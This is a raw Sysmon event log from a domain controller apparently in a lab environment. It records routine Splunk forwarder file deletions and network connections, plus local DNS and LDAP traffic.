354300x80000000000000002201408Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:25.019{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55211-false10.0.1.12-8000- 23542300x80000000000000002201407Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:29.401{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D90B42EC6F60FEA970B4ACE60F46F4A0,SHA256=1BCB01985F085085D8D3583CF69BAA433B0375A3A2F83FEE90779DF0DDC5D467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201410Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:30.980{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FE54142744AB8F8E2D74C15A88049F2,SHA256=263A4606106B5F9F0E583CC68BE494414E9BE4C6809428C1B024BAFAF44FC5F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201409Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:30.433{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A77132792D2C223569A55E295995737B,SHA256=0E0C4C0D786E678E1ADA9599A16434F53DB282B569B4352CB92376CF243C444C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201411Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:31.495{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00D08B17CD4512A60C94DE74203D5594,SHA256=9626A8BE7D90010EB68BD7787F9012E676BD8A84938FCED9FCE2EBE936424C69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201412Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:32.526{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DE02DA10AC60A01854E1AEB9CC6F74A,SHA256=E7D394C2BD59484C1DC515E11C0E3784C61BB858F0050A376E33AF7AA2C93086,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201415Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:30.066{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55213-false10.0.1.12-8000- 23542300x80000000000000002201414Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:33.542{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5A918F9F9BA193A9E9737BDF115327F,SHA256=B945DE173E8CE35A6A94E4FD102C4277F3825F33BA760A901EB30FEC542DAAC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201413Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:33.261{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7EB5C14F4D50BC1B44945F423669BA2,SHA256=87EA1F7D1BC38E8934393432E52BCE4F7C9BC01D80AEE6963DBAB68CE6C783B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201417Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:34.714{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA2BED7EFBBFBFDF9D2FEF5D012B1D34,SHA256=08C008E4D797B9F19D50B9416DD4C03D8043455C544B6A7AB6C35552FA5F0A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201416Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:34.558{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E334998EF5B48114D3251C551C7FF2,SHA256=85A138ACE9108ABC54EACDC092AA5D9A9746D08D6B61C0F7FDAD6177DECAED47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201418Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:35.573{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D60F3B4884E5D713B44AAAE63DC29E19,SHA256=803BD6E02C1A7BD92782413FB17C719FBEAD3FD20A67A1E7BD384FF742672B62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201419Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:36.605{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE2FCBB17FE1C5262FA4DFE09B23A978,SHA256=1B7EB900C745FE86A55EC6BE79A5C4926C0F4E3F3FC99F95F69ACC1CA87DD6A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201420Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:37.620{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18C109AB72E673EF4F4D6B8B959B8C7,SHA256=471CEA21C89FDA8C545810169D9498E93B232578FCDAFC220DE867EE578600BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201422Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:38.636{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15A380076739CFFC1E2994718E5026CF,SHA256=9F972B348EEC9B713CF6773FE1A9B21F6F0A0F0F7C11D50BFA0A3FE58C576E71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201421Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:38.636{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5862D4A9D3840B2C572812843EF4782,SHA256=7370EB6314D3AD8778B16323BB0C8D215776A365C5873129723A8D39F9A0041F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201425Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:35.456{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local62792- 23542300x80000000000000002201424Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:39.667{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB1DC94ECC620B00CB134599F2FBD897,SHA256=FEB6C2763F853FF3A37F12A8C3783B7DCDB6F1D304476EEF529FF89B56B237F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201423Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:39.651{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=481601CE8295F77B8C4BFDF7B3E52A88,SHA256=8C7EFEE302307968002E1B8C1F9A46B3C75CCDF278EA0F077538C7B1ADDA75B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201428Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:36.471{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62792- 354300x80000000000000002201427Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:35.894{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55214-false10.0.1.12-8000- 23542300x80000000000000002201426Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:40.667{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E6B64D426084BF131C0DF86578DE5C8,SHA256=702C9A27A65B37E1511D8E94BCCCA692379092EB70ABD5F778547D0735782226,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201429Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:41.667{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BED2812167B071DEE5FE7C35CC86845,SHA256=1F354BDC39269A8D3D6A97F0B8B34F32FFB23A51C4C87F5E9899AD4CD1013FFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201430Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:42.714{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F7E27E3068EDE5A345326BF81CDDEE,SHA256=55E0A41F48B551E6D1780A7BBA3BA150385E0D6321244AF8817EB156CD34CBBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201431Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:43.729{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EDE9758C158763904B0801879BF29D0,SHA256=D0C15A1C3DDD8E5CFB935354EF9AEC9B6D429F3D1DCBB6472FE5BFBB4C362B19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201433Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:44.745{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FAD15B009D26E96D35D24C2ADADCCB9,SHA256=47B51674F1EB5614C3F8F381EA2FEB11497807ECAFD37226D76B4719ED2CE132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201432Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:44.120{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26ADD38341ACAF87A3FEBAB2019BCDD1,SHA256=B27C41A8A7EFFC358BBF2B5E81815C5E8EB3C6196EC97DA7E48C33B4FF41D34D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201435Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:45.761{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4BE4A8DFAFCFD31421AB4DDDCA7D81D,SHA256=CEFCDFB3AF9A41F4ECF8639406396D5149B40774AC34E80ADDC86A658CA5C2DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201434Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:40.925{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55215-false10.0.1.12-8000- 23542300x80000000000000002201437Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:46.808{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85B6A58D1922A8D7D0031B6F647F941F,SHA256=44B8169140B8539A9C5644B0E5BE5B2C480E630D2FC4E1D24A4661C8C68D2A24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201436Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:46.776{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4828AB780DC22FA028EFE0DCAC1F55A4,SHA256=2F9C268F121228074681636FBC176B77EE82A6ECDF6A30DACEDD22CEA53F35FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201438Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:47.808{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E04CB9A172132FCF9EBD488EBF1C3943,SHA256=5F3554BED6B5EDF23920CE72AD6EF6480C0446608110158AC01882444EECC65A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201440Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:48.854{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=947A8CABCC8A745CFC6D94D218468D83,SHA256=DB24DF5BE59A03757B694955A7320EC5B87362285F3BD3980B002EDEDCDB3A1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201439Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:48.823{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF46FBADE5F0BE7B88D7988B8B69177C,SHA256=41540A4D7FDF8F337E4AB64FAB59CCE5A2A6735F2DB12E6B2984B49CD4A82988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201442Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:49.854{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76FC10E73A57602B73379DDB5B489145,SHA256=F4DDCB4C865E3D99D6A9717AE6B02A44DA4ADFE85A55B9B76DD23828E1683F32,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201441Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:45.472{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58689- 23542300x80000000000000002201445Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:50.870{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA29FF60A8BD2DBAA6546EC4FC33E0ED,SHA256=9C72562342819B5B4DB1F59FB5B69CD15E0BCC74EEC931026EBA36D3FE6B21DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201444Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:46.487{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58689- 354300x80000000000000002201443Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:45.988{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55216-false10.0.1.12-8000- 23542300x80000000000000002201446Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:51.901{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFDDBDC5F8FAB92FC1FA6A273C8831C0,SHA256=24FD8D21FFDD4050BBCD20C57489F2EDDC6F9A488327B4BC7D7FC7F5B5B65F98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201447Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:52.917{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DB086B2BBA1BBD2D05AF527E9666504,SHA256=CD6B78D4BB31EAA1BCCB1FFE0C1A8C187D74FA2C1D5D42A58707EFF750BC5B86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201448Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:53.948{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA25CB71B53E7E42B421681955F20ABA,SHA256=BED50A026D366443849B46627DCD224E05A10A93B5E6ED6964332CF11055351A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201451Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:54.979{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D05EE405F2BE58662E1B605ED0555922,SHA256=8F4ACAD2BE41DFB57AAD3370C7374784FAC05329E3AA2A108A57646064E8404B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201450Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:54.479{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1865CFAB4CE560322F4295A7D3187FC,SHA256=0A77555757F63C35C6CF7759E5547B01218B187A0B32E6CDFA08EABCA3633758,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201449Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:54.479{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFFDB906F289A0F0FE5AF2D82EAA6A6A,SHA256=AFE8D7D70AB13ECBC3CB4930CD05EF4111E2F8E78FE3502431CC67956753E192,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201453Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:55.979{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D1ABC5827FBF8A7F43C745DD67402DD,SHA256=F5A9F41503912308BFE19D98FFB23E0AE0BA4CA6674E7B6674D0F646CFF6A450,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201452Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:51.081{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55217-false10.0.1.12-8000- 23542300x80000000000000002201454Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:56.683{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1865CFAB4CE560322F4295A7D3187FC,SHA256=0A77555757F63C35C6CF7759E5547B01218B187A0B32E6CDFA08EABCA3633758,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201457Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:53.863{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55218-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002201456Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:53.863{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55218-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002201455Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:57.011{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=435D12E09CD3C9E5A348BAFF4944E586,SHA256=078D47E037BE4BEFF38094CB433C665FED6ACEEB01C44861C7519F12099CCF06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201458Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:58.042{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54CD9514428D801C2586F89031276039,SHA256=260C263CC304657F9EB23156B793D9D48C54601543AF55622EE133EE5D873882,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201459Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:59.058{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=799ED3B2495E5AFCAECF21902449ACFA,SHA256=21D9F913A1FB38BD9ADA1F047079A9861B58FBBF5C4926D41321A35288C5D378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201461Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:59:00.104{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D566F322CC37874A72FDC243BEFEA565,SHA256=515189F24F0592CFEAEF4C4A68AA816C6946D40EA80C4BBBC07A6495932C3C0E,IMPHASH=00000000000000000000000000000000falsetrue 